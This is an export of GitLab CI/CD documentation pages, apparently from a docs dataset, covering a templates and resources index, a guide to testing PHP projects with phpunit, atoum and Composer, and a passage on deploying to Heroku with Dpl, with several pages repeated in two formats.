Vault | [Authenticating and Reading Secrets With HashiCorp Vault](../secrets/hashicorp_vault.md). | ### Contributed examples You can help people that use your favorite programming language by submitting a link to a guide for that language. These contributed guides are hosted externally or in separate example projects: | Use case | Resource | |-------------------------------|----------| | Clojure | [Test a Clojure application with GitLab CI/CD](https://gitlab.com/gitlab-examples/clojure-web-application). | | Game development | [DevOps and Game Development with GitLab CI/CD](https://gitlab.com/gitlab-examples/gitlab-game-demo/). | | Java with Maven | [How to deploy Maven projects to Artifactory with GitLab CI/CD](https://gitlab.com/gitlab-examples/maven/simple-maven-example). | | Java with Spring Boot | [Deploy a Spring Boot application to Cloud Foundry with GitLab CI/CD](https://gitlab.com/gitlab-examples/spring-gitlab-cf-deploy-demo). | | Parallel testing Ruby & JS | [GitLab CI/CD parallel jobs testing for Ruby & JavaScript projects](https://docs.knapsackpro.com/2019/how-to-run-parallel-jobs-for-rspec-tests-on-gitlab-ci-pipeline-and-speed-up-ruby-javascript-testing). | | Python on Heroku | [Test and deploy a Python application with GitLab CI/CD](https://gitlab.com/gitlab-examples/python-getting-started). | | Ruby on Heroku | [Test and deploy a Ruby application with GitLab CI/CD](https://gitlab.com/gitlab-examples/ruby-getting-started). | | Scala on Heroku | [Test and deploy a Scala application to Heroku](https://gitlab.com/gitlab-examples/scala-sbt). | ## CI/CD templates Get started with GitLab CI/CD and your favorite programming language or framework by using a `.gitlab-ci.yml` [template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). When you create a `.gitlab-ci.yml` file in the UI, you can choose one of these templates: - [Android (`Android.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android.gitlab-ci.yml) - [Android with fastlane (`Android-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android-Fastlane.gitlab-ci.yml) - [Bash (`Bash.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Bash.gitlab-ci.yml) - [C++ (`C++.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/C++.gitlab-ci.yml) - [Chef (`Chef.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Chef.gitlab-ci.yml) - [Clojure (`Clojure.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Clojure.gitlab-ci.yml) - [Composer `Composer.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Composer.gitlab-ci.yml) - [Crystal (`Crystal.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Crystal.gitlab-ci.yml) - [Dart (`Dart.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Dart.gitlab-ci.yml) - [Django (`Django.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Django.gitlab-ci.yml) - [Docker (`Docker.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml) - [dotNET (`dotNET.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET.gitlab-ci.yml) - [dotNET Core (`dotNET-Core.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET-Core.gitlab-ci.yml) - [Elixir (`Elixir.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Elixir.gitlab-ci.yml) - [Flutter (`Flutter.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Flutter.gitlab-ci.yml) - [Go (`Go.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Go.gitlab-ci.yml) - [Gradle (`Gradle.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Gradle.gitlab-ci.yml) - [Grails (`Grails.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Grails.gitlab-ci.yml) - [iOS with fastlane (`iOS-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/iOS-Fastlane.gitlab-ci.yml) - [Julia (`Julia.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Julia.gitlab-ci.yml) - [Laravel (`Laravel.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Laravel.gitlab-ci.yml) - [LaTeX (`LaTeX.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/LaTeX.gitlab-ci.yml) - [Maven (`Maven.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml) - [Mono (`Mono.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Mono.gitlab-ci.yml) - [npm (`npm.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/npm.gitlab-ci.yml) - [Node.js (`Nodejs.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Nodejs.gitlab-ci.yml) - [OpenShift (`OpenShift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/OpenShift.gitlab-ci.yml) - [Packer (`Packer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Packer.gitlab-ci.yml) - [PHP (`PHP.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/PHP.gitlab-ci.yml) - [Python (`Python.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Python.gitlab-ci.yml) - [Ruby (`Ruby.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Ruby.gitlab-ci.yml) - [Rust (`Rust.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Rust.gitlab-ci.yml) - [Scala (`Scala.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Scala.gitlab-ci.yml) - [Swift (`Swift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Swift.gitlab-ci.yml) - [Terraform (`Terraform.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.gitlab-ci.yml) - [Terraform (`Terraform.latest.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.latest.gitlab-ci.yml) If a programming language or framework template is not in this list, you can contribute one. To create a template, submit a merge request to [the templates list](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). ### Adding templates to your GitLab installation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can add custom examples and templates to your instance. Your GitLab administrator can [designate an instance template repository](../../administration/settings/instance_template_repository.md) that contains examples and templates specific to your organization. ## Other resources This section provides further resources to help you get familiar with various uses of GitLab CI/CD. Older articles and videos may not reflect the state of the latest GitLab release. ### CI/CD in the cloud For examples of setting up GitLab CI/CD for cloud-based environments, see: - [How to set up multi-account AWS SAM deployments with GitLab CI](https://about.gitlab.com/blog/2019/02/04/multi-account-aws-sam-deployments-with-gitlab-ci/) - Video: [Automating Kubernetes Deployments with GitLab CI/CD](https://www.youtube.com/watch?v=wEDRfAz6_Uw) - [How to autoscale continuous deployment with GitLab Runner on DigitalOcean](https://about.gitlab.com/blog/2018/06/19/autoscale-continuous-deployment-gitlab-runner-digital-ocean/) - [How to create a CI/CD pipeline with Auto Deploy to Kubernetes using GitLab and Helm](https://about.gitlab.com/blog/2017/09/21/how-to-create-a-ci-cd-pipeline-with-auto-deploy-to-kubernetes-using-gitlab/) - Video: [Demo - Deploying from GitLab to OpenShift Container Cluster](https://youtu.be/EwbhA53Jpp4) - Tutorial: [Set up a GitLab.com Civo Kubernetes integration with Gitpod](https://gitlab.com/k33g_org/k33g_org.gitlab.io/-/issues/82) See also the following video overviews: - Video: [Kubernetes, GitLab, and Cloud Native](https://www.youtube.com/watch?v=d-9awBxEbvQ) - Video: [Deploying to IBM Cloud with GitLab CI/CD](https://www.youtube.com/watch?v=6ZF4vgKMd-g) ### Customer stories For some customer experiences with GitLab CI/CD, see: - [How Verizon Connect reduced data center deploys from 30 days to under 8 hours with GitLab](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/) - [How Wag! cut their release process from 40 minutes to just 6](https://about.gitlab.com/blog/2019/01/16/wag-labs-blog-post/) - [How Jaguar Land Rover embraced CI to speed up their software lifecycle](https://about.gitlab.com/blog/2018/07/23/chris-hill-devops-enterprise-summit-talk/) ### Getting started For some examples to help get you started, see: - [GitLab CI/CD's 2018 highlights](https://about.gitlab.com/blog/2019/01/21/gitlab-ci-cd-features-improvements/) - [A beginner's guide to continuous integration](https://about.gitlab.com/blog/2018/01/22/a-beginners-guide-to-continuous-integration/) ### Implementing GitLab CI/CD For examples of others who have implemented GitLab CI/CD, see: - [How to streamline interactions between multiple repositories with multi-project pipelines](https://about.gitlab.com/blog/2018/10/31/use-multiproject-pipelines-with-gitlab-cicd/) - [How we used GitLab CI to build GitLab faster](https://about.gitlab.com/blog/2018/05/02/using-gitlab-ci-to-build-gitlab-faster/) - [Test all the things in GitLab CI with Docker by example](https://about.gitlab.com/blog/2018/02/05/test-all-the-things-gitlab-ci-docker-examples/) - [A Craftsman looks at continuous integration](https://about.gitlab.com/blog/2018/01/17/craftsman-looks-at-continuous-integration/) - [Go tools and GitLab: How to do continuous integration like a boss](https://about.gitlab.com/blog/2017/11/27/go-tools-and-gitlab-how-to-do-continuous-integration-like-a-boss/) - [GitBot - automating boring Git operations with CI](https://about.gitlab.com/blog/2017/11/02/automating-boring-git-operations-gitlab-ci/) - [How to use GitLab CI for Vue.js](https://about.gitlab.com/blog/2017/09/12/vuejs-app-gitlab/) - Video: [GitLab CI/CD Deep Dive](https://youtu.be/pBe4t1CD8Fc?t=195) - [Dockerizing GitLab review apps](https://about.gitlab.com/blog/2017/07/11/dockerizing-review-apps/) - [Fast and natural continuous integration with GitLab CI](https://about.gitlab.com/blog/2017/05/22/fast-and-natural-continuous-integration-with-gitlab-ci/) - [Demo: CI/CD with GitLab in action](https://about.gitlab.com/blog/2017/03/13/ci-cd-demo/) ### Migrating to GitLab from third-party CI tools Examples of migration to GitLab CI/CD from other tools: - [Bamboo](../migration/bamboo.md) - [CircleCI](../migration/circleci.md) - [GitHub Actions](../migration/github_actions.md) - [Jenkins](../migration/jenkins.md) - [TeamCity](../migration/teamcity.md) ### Integrating GitLab CI/CD with other systems To see how you can integrate GitLab CI/CD with third-party systems, see: - [Streamline and shorten error remediation with Sentry's new GitLab integration](https://about.gitlab.com/blog/2019/01/25/sentry-integration-blog-post/) - [How to simplify your smart home configuration with GitLab CI/CD](https://about.gitlab.com/blog/2018/08/02/using-the-gitlab-ci-slash-cd-for-smart-home-configuration-management/) - [Demo: GitLab + Jira + Jenkins](https://about.gitlab.com/blog/2018/07/30/gitlab-workflow-with-jira-jenkins/) - [Introducing Auto Breakfast from GitLab (sort of)](https://about.gitlab.com/blog/2018/06/29/introducing-auto-breakfast-from-gitlab/) ### Mobile development For help with using GitLab CI/CD for mobile application development, see: - [How to publish Android apps to the Google Play Store with GitLab and fastlane](https://about.gitlab.com/blog/2019/01/28/android-publishing-with-gitlab-and-fastlane/) - [Setting up GitLab CI for Android projects](https://about.gitlab.com/blog/2018/10/24/setting-up-gitlab-ci-for-android-projects/) - [Working with YAML in GitLab CI from the Android perspective](https://about.gitlab.com/blog/2017/11/20/working-with-yaml-gitlab-ci-android/) - [How to use GitLab CI and MacStadium to build your macOS or iOS projects](https://about.gitlab.com/blog/2017/05/15/how-to-use-macstadium-and-gitlab-ci-to-build-your-macos-or-ios-projects/) - [Setting up GitLab CI for iOS projects](https://about.gitlab.com/blog/2016/03/10/setting-up-gitlab-ci-for-ios-projects/)
https://docs.gitlab.com/ci/php
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/php.md
2025-08-13
doc/ci/examples
[ "doc", "ci", "examples" ]
php.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Testing PHP projects
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide covers basic building instructions for PHP projects. Two testing scenarios are covered: using the Docker executor and using the Shell executor. ## Test PHP projects using the Docker executor While it is possible to test PHP apps on any system, this would require manual configuration from the developer. To overcome this we use the official [PHP Docker image](https://hub.docker.com/_/php) that can be found in Docker Hub. This allows us to test PHP projects against different versions of PHP. However, not everything is plug 'n' play, you still need to configure some things manually. As with every job, you need to create a valid `.gitlab-ci.yml` describing the build environment. Let's first specify the PHP image that is used for the job process. (You can read more about what an image means in the runner's lingo reading about [Using Docker images](../docker/using_docker_images.md#what-is-an-image).) Start by adding the image to your `.gitlab-ci.yml`: ```yaml image: php:5.6 ``` The official images are great, but they lack a few useful tools for testing. We need to first prepare the build environment. A way to overcome this is to create a script which installs all prerequisites prior the actual testing is done. Let's create a `ci/docker_install.sh` file in the root directory of our repository with the following content: ```shell #!/bin/bash # We need to install dependencies only for Docker [[ ! -e /.dockerenv ]] && exit 0 set -xe # Install git (the php image doesn't have it) which is required by composer apt-get update -yqq apt-get install git -yqq # Install phpunit, the tool that we will use for testing curl --location --output /usr/local/bin/phpunit "https://phar.phpunit.de/phpunit.phar" chmod +x /usr/local/bin/phpunit # Install mysql driver # Here you can install any other extension that you need docker-php-ext-install pdo_mysql ``` You might wonder what `docker-php-ext-install` is. In short, it is a script provided by the official PHP Docker image that you can use to easily install extensions. For more information read [the documentation](https://hub.docker.com/_/php). Now that we created the script that contains all prerequisites for our build environment, let's add it in `.gitlab-ci.yml`: ```yaml before_script: - bash ci/docker_install.sh > /dev/null ``` Last step, run the actual tests using `phpunit`: ```yaml test:app: script: - phpunit --configuration phpunit_myapp.xml ``` Finally, commit your files and push them to GitLab to see your build succeeding (or failing). The final `.gitlab-ci.yml` should look similar to this: ```yaml default: # Select image from https://hub.docker.com/_/php image: php:5.6 before_script: # Install dependencies - bash ci/docker_install.sh > /dev/null test:app: script: - phpunit --configuration phpunit_myapp.xml ``` ### Test against different PHP versions in Docker builds Testing against multiple versions of PHP is super easy. Just add another job with a different Docker image version and the runner does the rest: ```yaml default: before_script: # Install dependencies - bash ci/docker_install.sh > /dev/null # We test PHP5.6 test:5.6: image: php:5.6 script: - phpunit --configuration phpunit_myapp.xml # We test PHP7.0 (good luck with that) test:7.0: image: php:7.0 script: - phpunit --configuration phpunit_myapp.xml ``` ### Custom PHP configuration in Docker builds There are times where you need to customise your PHP environment by putting your `.ini` file into `/usr/local/etc/php/conf.d/`. For that purpose add a `before_script` action: ```yaml before_script: - cp my_php.ini /usr/local/etc/php/conf.d/test.ini ``` Of course, `my_php.ini` must be present in the root directory of your repository. ## Test PHP projects using the Shell executor The shell executor runs your job in a terminal session on your server. To test your projects, you must first ensure that all dependencies are installed. For example, in a VM running Debian 8, first update the cache, and then install `phpunit` and `php5-mysql`: ```shell sudo apt-get update -y sudo apt-get install -y phpunit php5-mysql ``` Next, add the following snippet to your `.gitlab-ci.yml`: ```yaml test:app: script: - phpunit --configuration phpunit_myapp.xml ``` Finally, push to GitLab and let the tests begin! ### Test against different PHP versions in Shell builds The [phpenv](https://github.com/phpenv/phpenv) project allows you to manage different versions of PHP each with its own configuration. This is especially useful when testing PHP projects with the Shell executor. You have to install it on your build machine under the `gitlab-runner` user following [the upstream installation guide](https://github.com/phpenv/phpenv#installation). Using phpenv also allows you to configure the PHP environment with: ```shell phpenv config-add my_config.ini ``` **Important note**: It seems `phpenv/phpenv` [is abandoned](https://github.com/phpenv/phpenv/issues/57). There is a fork at [`madumlao/phpenv`](https://github.com/madumlao/phpenv) that tries to bring the project back to life. [`CHH/phpenv`](https://github.com/CHH/phpenv) also seems like a good alternative. Picking any of the mentioned tools works with the basic phpenv commands. Guiding you to choose the right phpenv is out of the scope of this tutorial.* ### Install custom extensions Because this is a pretty bare installation of the PHP environment, you may need some extensions that are not currently present on the build machine. To install additional extensions, execute: ```shell pecl install <extension> ``` It's not advised to add this to `.gitlab-ci.yml`. You should execute this command once, only to set up the build environment. ## Extend your tests ### Using `atoum` Instead of PHPUnit, you can use any other tool to run unit tests. For example you can use [`atoum`](https://github.com/atoum/atoum): ```yaml test:atoum: before_script: - wget http://downloads.atoum.org/nightly/mageekguy.atoum.phar script: - php mageekguy.atoum.phar ``` ### Using Composer The majority of the PHP projects use Composer for managing their PHP packages. To execute Composer before running your tests, add the following to your `.gitlab-ci.yml`: ```yaml # Composer stores all downloaded packages in the vendor/ directory. # Do not use the following if the vendor/ directory is committed to # your git repository. default: cache: paths: - vendor/ before_script: # Install composer dependencies - wget https://composer.github.io/installer.sig -O - -q | tr -d '\n' > installer.sig - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php -r "if (hash_file('SHA384', 'composer-setup.php') === file_get_contents('installer.sig')) { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" - php composer-setup.php - php -r "unlink('composer-setup.php'); unlink('installer.sig');" - php composer.phar install ``` ## Access private packages or dependencies If your test suite needs to access a private repository, you need to configure the [SSH keys](../jobs/ssh_keys.md) to be able to clone it. ## Use databases or other services Most of the time, you need a running database for your tests to be able to run. If you're using the Docker executor, you can leverage Docker to link to other containers. With GitLab Runner, this can be achieved by defining a `service`. This functionality is covered in [the CI services](../services/_index.md) documentation. ## Example project We have set up an [Example PHP Project](https://gitlab.com/gitlab-examples/php) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit, and push your changes. Within a few moments the changes are picked by a public runner and the job begins.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Testing PHP projects breadcrumbs: - doc - ci - examples --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This guide covers basic building instructions for PHP projects. Two testing scenarios are covered: using the Docker executor and using the Shell executor. ## Test PHP projects using the Docker executor While it is possible to test PHP apps on any system, this would require manual configuration from the developer. To overcome this we use the official [PHP Docker image](https://hub.docker.com/_/php) that can be found in Docker Hub. This allows us to test PHP projects against different versions of PHP. However, not everything is plug 'n' play, you still need to configure some things manually. As with every job, you need to create a valid `.gitlab-ci.yml` describing the build environment. Let's first specify the PHP image that is used for the job process. (You can read more about what an image means in the runner's lingo reading about [Using Docker images](../docker/using_docker_images.md#what-is-an-image).) Start by adding the image to your `.gitlab-ci.yml`: ```yaml image: php:5.6 ``` The official images are great, but they lack a few useful tools for testing. We need to first prepare the build environment. A way to overcome this is to create a script which installs all prerequisites prior the actual testing is done. Let's create a `ci/docker_install.sh` file in the root directory of our repository with the following content: ```shell #!/bin/bash # We need to install dependencies only for Docker [[ ! -e /.dockerenv ]] && exit 0 set -xe # Install git (the php image doesn't have it) which is required by composer apt-get update -yqq apt-get install git -yqq # Install phpunit, the tool that we will use for testing curl --location --output /usr/local/bin/phpunit "https://phar.phpunit.de/phpunit.phar" chmod +x /usr/local/bin/phpunit # Install mysql driver # Here you can install any other extension that you need docker-php-ext-install pdo_mysql ``` You might wonder what `docker-php-ext-install` is. In short, it is a script provided by the official PHP Docker image that you can use to easily install extensions. For more information read [the documentation](https://hub.docker.com/_/php). Now that we created the script that contains all prerequisites for our build environment, let's add it in `.gitlab-ci.yml`: ```yaml before_script: - bash ci/docker_install.sh > /dev/null ``` Last step, run the actual tests using `phpunit`: ```yaml test:app: script: - phpunit --configuration phpunit_myapp.xml ``` Finally, commit your files and push them to GitLab to see your build succeeding (or failing). The final `.gitlab-ci.yml` should look similar to this: ```yaml default: # Select image from https://hub.docker.com/_/php image: php:5.6 before_script: # Install dependencies - bash ci/docker_install.sh > /dev/null test:app: script: - phpunit --configuration phpunit_myapp.xml ``` ### Test against different PHP versions in Docker builds Testing against multiple versions of PHP is super easy. Just add another job with a different Docker image version and the runner does the rest: ```yaml default: before_script: # Install dependencies - bash ci/docker_install.sh > /dev/null # We test PHP5.6 test:5.6: image: php:5.6 script: - phpunit --configuration phpunit_myapp.xml # We test PHP7.0 (good luck with that) test:7.0: image: php:7.0 script: - phpunit --configuration phpunit_myapp.xml ``` ### Custom PHP configuration in Docker builds There are times where you need to customise your PHP environment by putting your `.ini` file into `/usr/local/etc/php/conf.d/`. For that purpose add a `before_script` action: ```yaml before_script: - cp my_php.ini /usr/local/etc/php/conf.d/test.ini ``` Of course, `my_php.ini` must be present in the root directory of your repository. ## Test PHP projects using the Shell executor The shell executor runs your job in a terminal session on your server. To test your projects, you must first ensure that all dependencies are installed. For example, in a VM running Debian 8, first update the cache, and then install `phpunit` and `php5-mysql`: ```shell sudo apt-get update -y sudo apt-get install -y phpunit php5-mysql ``` Next, add the following snippet to your `.gitlab-ci.yml`: ```yaml test:app: script: - phpunit --configuration phpunit_myapp.xml ``` Finally, push to GitLab and let the tests begin! ### Test against different PHP versions in Shell builds The [phpenv](https://github.com/phpenv/phpenv) project allows you to manage different versions of PHP each with its own configuration. This is especially useful when testing PHP projects with the Shell executor. You have to install it on your build machine under the `gitlab-runner` user following [the upstream installation guide](https://github.com/phpenv/phpenv#installation). Using phpenv also allows you to configure the PHP environment with: ```shell phpenv config-add my_config.ini ``` **Important note**: It seems `phpenv/phpenv` [is abandoned](https://github.com/phpenv/phpenv/issues/57). There is a fork at [`madumlao/phpenv`](https://github.com/madumlao/phpenv) that tries to bring the project back to life. [`CHH/phpenv`](https://github.com/CHH/phpenv) also seems like a good alternative. Picking any of the mentioned tools works with the basic phpenv commands. Guiding you to choose the right phpenv is out of the scope of this tutorial.* ### Install custom extensions Because this is a pretty bare installation of the PHP environment, you may need some extensions that are not currently present on the build machine. To install additional extensions, execute: ```shell pecl install <extension> ``` It's not advised to add this to `.gitlab-ci.yml`. You should execute this command once, only to set up the build environment. ## Extend your tests ### Using `atoum` Instead of PHPUnit, you can use any other tool to run unit tests. For example you can use [`atoum`](https://github.com/atoum/atoum): ```yaml test:atoum: before_script: - wget http://downloads.atoum.org/nightly/mageekguy.atoum.phar script: - php mageekguy.atoum.phar ``` ### Using Composer The majority of the PHP projects use Composer for managing their PHP packages. To execute Composer before running your tests, add the following to your `.gitlab-ci.yml`: ```yaml # Composer stores all downloaded packages in the vendor/ directory. # Do not use the following if the vendor/ directory is committed to # your git repository. default: cache: paths: - vendor/ before_script: # Install composer dependencies - wget https://composer.github.io/installer.sig -O - -q | tr -d '\n' > installer.sig - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php -r "if (hash_file('SHA384', 'composer-setup.php') === file_get_contents('installer.sig')) { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" - php composer-setup.php - php -r "unlink('composer-setup.php'); unlink('installer.sig');" - php composer.phar install ``` ## Access private packages or dependencies If your test suite needs to access a private repository, you need to configure the [SSH keys](../jobs/ssh_keys.md) to be able to clone it. ## Use databases or other services Most of the time, you need a running database for your tests to be able to run. If you're using the Docker executor, you can leverage Docker to link to other containers. With GitLab Runner, this can be achieved by defining a `service`. This functionality is covered in [the CI services](../services/_index.md) documentation. ## Example project We have set up an [Example PHP Project](https://gitlab.com/gitlab-examples/php) for your convenience that runs on [GitLab.com](https://gitlab.com) using our publicly available [instance runners](../runners/_index.md). Want to hack on it? Fork it, commit, and push your changes. Within a few moments the changes are picked by a public runner and the job begins.
https://docs.gitlab.com/ci/examples/deployment
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/examples/_index.md
2025-08-13
doc/ci/examples/deployment
[ "doc", "ci", "examples", "deployment" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using Dpl as a deployment tool
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [Dpl](https://github.com/travis-ci/dpl) (pronounced like the letters D-P-L) is a deploy tool made for continuous deployment that's developed and used by Travis CI, but can also be used with GitLab CI/CD. Dpl can be used to deploy to any of the [supported providers](https://github.com/travis-ci/dpl#supported-providers). ## Prerequisite To use Dpl you need at least Ruby 1.9.3 with ability to install gems. ## Basic usage Dpl can be installed on any machine with: ```shell gem install dpl ``` This allows you to test all commands from your local terminal, rather than having to test it on a CI server. If you don't have Ruby installed you can do it on Debian-compatible Linux with: ```shell apt-get update apt-get install ruby-dev ``` The Dpl provides support for vast number of services, including: Heroku, Cloud Foundry, AWS/S3, and more. To use it, define provider and any additional parameters required by the provider. For example if you want to use it to deploy your application to Heroku, you need to specify `heroku` as provider, specify `api_key` and `app`. All possible parameters can be found in the [Heroku API section](https://github.com/travis-ci/dpl#heroku-api). ```yaml staging: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY environment: staging ``` In the previous example we use Dpl to deploy `my-app-staging` to Heroku server with API key stored in `HEROKU_STAGING_API_KEY` secure variable. To use different provider take a look at long list of [Supported Providers](https://github.com/travis-ci/dpl#supported-providers). ## Using Dpl with Docker In most cases, you configured [GitLab Runner](https://docs.gitlab.com/runner/) to use your server's shell commands. This means that all commands are run in the context of local user (for example `gitlab_runner` or `gitlab_ci_multi_runner`). It also means that most probably in your Docker container you don't have the Ruby runtime installed. You must install it: ```yaml staging: stage: deploy script: - apt-get update -yq - apt-get install -y ruby-dev - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY rules: - if: $CI_COMMIT_BRANCH == "main" environment: staging ``` The first line `apt-get update -yq` updates the list of available packages, where second `apt-get install -y ruby-dev` installs the Ruby runtime on system. The previous example is valid for all Debian-compatible systems. ## Usage in staging and production It's pretty common in the development workflow to have staging (development) and production environments Let's consider the following example: we would like to deploy the `main` branch to `staging` and all tags to the `production` environment. The final `.gitlab-ci.yml` for that setup would look like this: ```yaml staging: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY rules: - if: $CI_COMMIT_BRANCH == "main" environment: staging production: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-production --api_key=$HEROKU_PRODUCTION_API_KEY rules: - if: $CI_COMMIT_TAG environment: production ``` We created two deploy jobs that are executed on different events: - `staging`: Executed for all commits pushed to the `main` branch - `production`: Executed for all pushed tags We also use two secure variables: - `HEROKU_STAGING_API_KEY`: Heroku API key used to deploy staging app - `HEROKU_PRODUCTION_API_KEY`: Heroku API key used to deploy production app ## Storing API keys To store API keys as secure variables: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. The variables defined in the project settings are sent along with the build script to the runner. The secure variables are stored out of the repository. Never store secrets in your project's `.gitlab-ci.yml` file. It is also important that the secret's value is hidden in the job log. You access added variable by prefixing it's name with `$` (on non-Windows runners) or `%` (for Windows Batch runners): - `$VARIABLE`: Use for non-Windows runners - `%VARIABLE%`: Use for Windows Batch runners Read more about [CI/CD variables](../../variables/_index.md).
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using Dpl as a deployment tool breadcrumbs: - doc - ci - examples - deployment --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [Dpl](https://github.com/travis-ci/dpl) (pronounced like the letters D-P-L) is a deploy tool made for continuous deployment that's developed and used by Travis CI, but can also be used with GitLab CI/CD. Dpl can be used to deploy to any of the [supported providers](https://github.com/travis-ci/dpl#supported-providers). ## Prerequisite To use Dpl you need at least Ruby 1.9.3 with ability to install gems. ## Basic usage Dpl can be installed on any machine with: ```shell gem install dpl ``` This allows you to test all commands from your local terminal, rather than having to test it on a CI server. If you don't have Ruby installed you can do it on Debian-compatible Linux with: ```shell apt-get update apt-get install ruby-dev ``` The Dpl provides support for vast number of services, including: Heroku, Cloud Foundry, AWS/S3, and more. To use it, define provider and any additional parameters required by the provider. For example if you want to use it to deploy your application to Heroku, you need to specify `heroku` as provider, specify `api_key` and `app`. All possible parameters can be found in the [Heroku API section](https://github.com/travis-ci/dpl#heroku-api). ```yaml staging: stage: deploy script: - gem install dpl - dpl heroku api --app=my-app-staging --api_key=$HEROKU_STAGING_API_KEY 